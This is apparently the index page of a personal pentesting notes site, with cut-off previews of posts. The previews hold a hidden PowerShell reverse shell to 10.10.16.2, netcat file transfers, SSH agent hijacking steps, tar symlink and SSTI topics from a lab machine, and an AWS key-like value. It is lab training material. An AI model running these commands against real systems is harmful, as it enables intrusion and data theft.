Shuciran Pentesting Notes

Domain Enumeration Gathering

Security Headers Analyze HTTP response headers and provide basic analysis of the target site’s security posture Security Headers SSL Server Test Analyzes a server’s SSL/TLS configuration and compa...

Powershell Reverse Shell

Reverse Shell powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.16.2", 1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($...

Tcpdump

Read a pcap -r read a file sudo tcpdump -r password_cracking_filtered.pcap Capture traffic -i choose interface sudo tcpdump -i tun0 icmp Filter by src/dst host tcpdump -n <src/dst> host 1...

Netcat File Transfer

Transfer File Output the exit of the file towards the netcat listener on the victim machine: type .\out.txt | .\nc.exe -nv 10.10.16.2 443 Then redirect the traffic towards the destination file: nc...

Netcat File Transfer

Transfer File Output the exit of the file towards the netcat listener on the victim machine: nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe Then redirect the traffic to...

Common Commands

mkdir mkdir -p {content,exploits,nmap} Reload zsh Useful command to reload zsh when it is modified (alias, keys, etc.): source ~/.zshrc Pyenv pyenv install <version> pyenv versions pyenv gl...

Epsilon (Medium)

Content Git Source retrieve with GitHacker AWS Enumeration Lambda Function Enumeration Authentication Bypass Abusing JWT Server Side Template Injection (SSTI) Tar Symlink Exploitati...

AWS CLI

AWS Configuration How to configure aws to get access to its functions: ❯ aws configure AWS Access Key ID [****************6TDC]: AQLA5M37BDN6FJP76TDCAWS Secret Access Key [****************Fo1A]: ...

Tar Symlink Exploitation (Linux)

Abusing dereference Reviewing the code inside we get this: #!/bin/bash file=`date +%N` /usr/bin/rm -rf /opt/backups/* /usr/bin/tar -cvf "/opt/backups/$file.tar" /var/www/app/ sha1sum "/opt/backups/...

SSH Hijacking

Step 1: We first determine the SSH process ID of the user on the compromised host: ps aux |grep sshd Step 2: Determine the SSH_AUTH_SOCK environment variable for the sshd PID: grep SSH_AUTH_SOCK ...